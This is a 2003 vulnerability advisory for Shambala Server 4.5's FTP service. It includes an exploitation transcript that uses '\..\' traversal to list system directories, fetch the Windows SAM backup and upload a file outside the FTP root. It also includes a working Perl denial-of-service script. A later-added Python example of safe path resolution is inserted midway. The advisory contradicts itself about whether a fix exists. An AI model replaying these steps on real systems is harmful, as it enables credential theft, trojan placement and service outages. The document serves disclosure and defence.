matrix_at_infowarfare.dk
Date: Sat Jan 18 2003 - 07:56:59 CST

                         Multible vulnerabilities found in
                            Shambala Server version 4.5
                                   (FTP Service)
                                                             
                               Discovered by Dennis Rand
                                www.Infowarfare.dk
    ------------------------------------------------------------------------

    SUMMARY

    Shambala is an easy to use communications server featuring the ability to
    serve and access web sites, ftp sites, and chat rooms. Using Shambala, you
    can quickly create a web site and host it from any PC. Shambala doesn't
    require NT and its installation is non-invasive. Shambala features a WYSIWYG
    DHTML editor for placing text and props on your web pages. The editor
    includes a navigation feature that allows you to express your web site as a
    geographical area and allow your users to move easily between areas. This
    feature also exists in the editor so you can create a space quickly without
    worrying about maintaining hyperlinks between areas. Shambala is drag and
    drop based allowing you to perfectly size and position your web page
    elements.

    You can use a page you are editing as an interactive whiteboard and chat
    space. When you move a prop or edit text, people connected to your workspace
    will receive the change that you make. Their workspace is automatically
    updated to be a mirror image of yours. If any machine in the group decides
    to leave, nothing is lost since each subscriber receives a full copy of the
    web page document being used as a workspace. This powerful feature can be
    used for interactive classrooms, games, demonstrations, even internet based
    group workshops.

    To transfer files, Shambala has an integrated ftp client and ftp server. The
    ftp server provides high performance access to shared files. You can also
    manage the security of the ftp site. The client can browse, download, and
    upload files to any ftp server. It can even automatically download
    everything on a remote ftp site. Shambala pushes the envelope of what you
    can do with web technology. It supports the existing infrastructure of the
    web but also provides powerful features that allow you to shape the future
    and evolution of cyberspace.

    A directory traversal vulnerability in the product allows remote attackers
    to make the server traverse into directories that reside outside the
    bounding FTP root directory. The server is also vulnerable to a DoS attack.

    DETAILS

    Vulnerable systems:
     * Shambala Server version 4.5 on Windows NT 4.0 and Windows 2000 Server,
       fully patched

    Immune systems:
     * None. Shambala will not fix any errors, as they do not think there are
       any problems.

    Shambala Server fails to filter out "\.." and "/.." sequences in specific
    command requests, allowing a remote user to break out of the restricted
    directories and gain read access to the system directory structure. It is
    therefore possible to discover the directory structure outside the
    configured areas and to retrieve files from outside them; worse still,
    files can be sent to locations outside the configured areas, so a trojan
    could be placed.

    The following transcript demonstrates a sample exploitation of the
    vulnerabilities:

    C:\>ftp
    ftp> open
    To 192.168.1.199
    Connected to 192.168.1.199.
    220 winnt40 - Shambala FTP Server Ready.
    User (192.168.1.199:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    ftp> ls
    200 PORT command successful.
    150 Opening data connection.
    192.168.1.199
    index-_-1_0_0.htm
    index-_0_0_0.htm
    index-_0_1_0.htm
    pwd.pl
    226 Transfer complete.
    ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
    ftp> cd ..
    550 Requested action not taken. Permission denied.
    ftp> cd /
    257 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 Opening data connection.
    192.168.1.199
    index-_-1_0_0.htm
    index-_0_0_0.htm
    index-_0_1_0.htm
    pwd.pl
    226 Transfer complete.
    ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
    ftp> cd \..\
    550 Requested action not taken. Permission denied.
    ftp> ls
    200 PORT command successful.
    150 Opening data connection.
    192.168.1.199
    index-_-1_0_0.htm
    index-_0_0_0.htm
    index-_0_1_0.htm
    pwd.pl
    226 Transfer complete.
    ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec.
    ftp> ls \..\..\..\..\..\..\..\..\..\..\
    200 PORT command successful.
    150 Opening data connection.
    AUTOEXEC.BAT
    CONFIG.SYS
    I386
    Inetpub
    Installationsfiler til Windows Update
    Multimedia Files
    OptionPack
    pagefile.sys
    Program Files
    pwd.pl
    Shambala Server 4.5
    TEMP
    WINNT
    226 Transfer complete.
    ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec.
    ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\
    200 PORT command successful.
    150 Opening data connection.
    autoexec.nt
    config.nt
    default._
    ntuser.da_
    sam._
    security._
    setup.log
    software._
    system._
    226 Transfer complete.
    ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec.
    ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._
    200 PORT command successful.
    150 Opening data connection.
    226 Transfer complete.
    ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
    ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl
    200 PORT command successful.
    150 Opening data connection.
    226 Transfer complete.
    ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec.
    ftp> bye
    221 Goodbye.
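    The check the transcript shows to be missing, as an added illustration that is not the vendor's code: a naive resolver that only recognises ".." between forward slashes (so `cd ..` is denied while `ls \..\..\` passes through to the Windows filesystem), beside a hardened resolver that unifies both separators and normalises the request against a virtual root before any filesystem call. FTP_ROOT and the sample paths are assumptions modelled on the transcript.

```python
import posixpath

# Added example, not Shambala's code: FTP_ROOT, cwd values and request
# strings below are constructed samples modelled on the advisory transcript.
FTP_ROOT = "C:/Shambala Server 4.5/ftproot"
DENIED = "550 Requested action not taken. Permission denied."


def naive_resolve(cwd: str, request: str) -> str:
    """Weak check the transcript suggests: '..' is only recognised with '/' as
    separator, so a backslash-delimited '\\..\\' is passed to the filesystem."""
    virtual = request if request.startswith("/") else posixpath.join(cwd, request)
    if ".." in virtual.split("/"):
        raise PermissionError(DENIED)
    return FTP_ROOT + virtual          # Windows will honour the "\.." inside


def safe_resolve(cwd: str, request: str) -> str:
    """Hardened mapping: treat '\\' and '/' alike, collapse '.' and '..' against
    a virtual root, and refuse anything that climbs above it or names a drive."""
    unified = request.replace("\\", "/")
    base = cwd.replace("\\", "/") or "/"
    virtual = unified if unified.startswith("/") else posixpath.join(base, unified)
    parts = []
    for part in virtual.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:              # would climb above the virtual root
                raise PermissionError(DENIED)
            parts.pop()
            continue
        if ":" in part:                # "C:" or NT device names never belong here
            raise PermissionError(DENIED)
        parts.append(part)
    return FTP_ROOT + "/" + "/".join(parts)


def is_rejected(resolver, cwd: str, request: str) -> bool:
    """True if the resolver refuses the request with a 550."""
    try:
        resolver(cwd, request)
    except PermissionError:
        return True
    return False
```

On a real server, additionally compare the real path of the result against the root after resolution, since symlinks, junctions and 8.3 short names can still defeat a purely lexical check.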

    The second attack type is a DoS attack that will kill the server application.
    ------------------------------------- Cut Here ------------------------------------------
    #!/usr/bin/perl
    #
    # Shambala Server version 4.5
    # http://www.evolvable.com
    # Dennis Rand - matrixinfowarfare.dk
    #
    # What happens when this exploit is sent: the server crashes
    # with an error message on the server.
    #
    # __________________________
    # | Run-time error '20127': |
    # |Invalid ConnectionID |
    # ----------------------------
    #
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    use strict;
    use warnings;
    use Net::FTP;

    my $target = shift() || die "usage: target ip";
    my $user = "anonymous";
    # The '@' must be escaped in a double-quoted Perl string; the original
    # line appears to have lost it in transit, leaving an invalid "\m" escape.
    my $pass = "mail\@mail.com";

    system('cls');
    print "Shambala Server version 4.5 DoS attack\n";
    print "Trying to connect and destroy target system at: $target...\n";
    # Net::FTP->new reports connection failures in $@, not $!
    my $ftp = Net::FTP->new($target, Debug => 1, Port => 21)
        || die "could not connect: $@";
    $ftp->login($user, $pass) || die "could not login: " . $ftp->message;
    $ftp->cwd("/");
    $ftp->quit;
    ------------------------------------- Cut Here ------------------------------------------

    Detection:
    Shambala Server version 4.5 is vulnerable to the above-described attacks.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    Shambala Server version 4.xx fixes this issue. The latest version is
    available from http://www.evolvable.com

    Disclosure timeline:
    18/11/2002 Found the Vulnerability.
    19/11/2002 Author notified. Sent mail to webmasterevolvable.com and
    helpevolvable.com
    18/01/2003 Responses received from evolvable
    18/01/2003 Public Disclosure.

    ADDITIONAL INFORMATION
    The vulnerability was discovered by <mailto:matrixinfowarfare.dk> Dennis Rand

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind. In no event shall we be liable for any damages whatsoever including
    direct, indirect, incidental, consequential, loss of business profits or
    special damages.
